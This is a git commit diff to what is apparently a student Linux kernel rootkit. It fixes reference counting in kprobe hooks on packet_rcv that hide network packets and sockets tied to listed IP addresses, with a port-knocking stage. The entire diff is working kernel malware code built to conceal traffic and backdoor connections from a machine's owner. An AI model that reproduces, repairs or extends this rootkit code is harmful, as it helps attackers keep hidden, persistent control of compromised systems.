commit 110f0b2180f1b8c0bdc20f7c62ba9c12e6600c8a
parent 40cae9d371a3d81fac079086fb815e03df98b907
Author: deurzen <m.deurzen@tum.de>
Date: Sun, 10 Jan 2021 14:42:23 +0100
fixes issues
Diffstat:
3 files changed, 15 insertions(+), 5 deletions(-)
diff --git a/src/hook.c b/src/hook.c
@@ -32,11 +32,13 @@ void **sys_calls;
atomic_t read_install_count;
atomic_t getdents_install_count;
atomic_t tty_read_install_count;
+atomic_t packet_rcv_install_count;
atomic_t read_count;
atomic_t getdents_count;
atomic_t getdents64_count;
atomic_t tty_read_count;
+atomic_t packet_rcv_count;
asmlinkage ssize_t (*sys_read)(const struct pt_regs *);
asmlinkage long (*sys_getdents)(const struct pt_regs *);
@@ -69,6 +71,7 @@ init_hooks(void)
atomic_set(&tty_read_count, 0);
atomic_set(&getdents_count, 0);
atomic_set(&getdents64_count, 0);
+ atomic_set(&packet_rcv_count, 0);
sys_read = (void *)sys_calls[__NR_read];
sys_getdents = (void *)sys_calls[__NR_getdents];
diff --git a/src/hook.h b/src/hook.h
@@ -21,6 +21,7 @@ extern atomic_t read_count;
extern atomic_t tty_read_count;
extern atomic_t getdents_count;
extern atomic_t getdents64_count;
+extern atomic_t packet_rcv_count;
extern asmlinkage ssize_t (*sys_read)(const struct pt_regs *);
extern asmlinkage long (*sys_getdents)(const struct pt_regs *);
diff --git a/src/packhide.c b/src/packhide.c
@@ -17,8 +17,6 @@
extern rootkit_t rootkit;
-atomic_t packet_rcv_install_count;
-
ip_list_t hidden_ips = {
.ip = { 0 },
.version = -1,
@@ -76,11 +74,12 @@ hide_packets(void)
void
unhide_packets(void)
{
- if (atomic_dec_return(&getdents_install_count) < 1) {
+ if (atomic_dec_return(&packet_rcv_install_count) < 1) {
DEBUG_INFO("___ UNHIDING PACKETS %d, %d\n", rootkit.hiding_packets, rootkit.hiding_sockets);
unregister_kprobe(&p_rcv);
unregister_kprobe(&tp_rcv);
unregister_kprobe(&p_rcv_spkt);
+ while (atomic_read(&packet_rcv_count) > 0);
}
}
@@ -137,6 +136,8 @@ g7_packet_rcv(struct kprobe *kp, struct pt_regs *pt_regs)
struct sk_buff *clone = skb_clone(skb, GFP_KERNEL);
pt_regs->di = (long unsigned int)clone;
+ atomic_inc(&packet_rcv_count);
+
if (ver == 0x60) {
struct ipv6hdr *iphdr;
@@ -163,8 +164,10 @@ g7_packet_rcv(struct kprobe *kp, struct pt_regs *pt_regs)
|| list_contains_ip(&hidden_ips, (u8 *)&iphdr->daddr, v4))
clone->pkt_type = PACKET_LOOPBACK;
}
- } else
+ } else {
+ atomic_dec(&packet_rcv_count);
return 0;
+ }
if (rootkit.hiding_sockets) {
// We need to intercept (RST) the TCP handshake
@@ -174,8 +177,10 @@ g7_packet_rcv(struct kprobe *kp, struct pt_regs *pt_regs)
tcphdr = (struct tcphdr *)skb_transport_header(skb);
unsigned src_port = (unsigned)ntohs(tcphdr->source);
- if (list_contains_knock(&ips_stage3, ip, version))
+ if (list_contains_knock(&ips_stage3, ip, version)) {
+ atomic_dec(&packet_rcv_count);
return 0;
+ }
if (tcphdr->syn || !tcphdr->ack)
goto check_port;
@@ -215,6 +220,7 @@ check_port:
}
}
+ atomic_dec(&packet_rcv_count);
return 0;
}
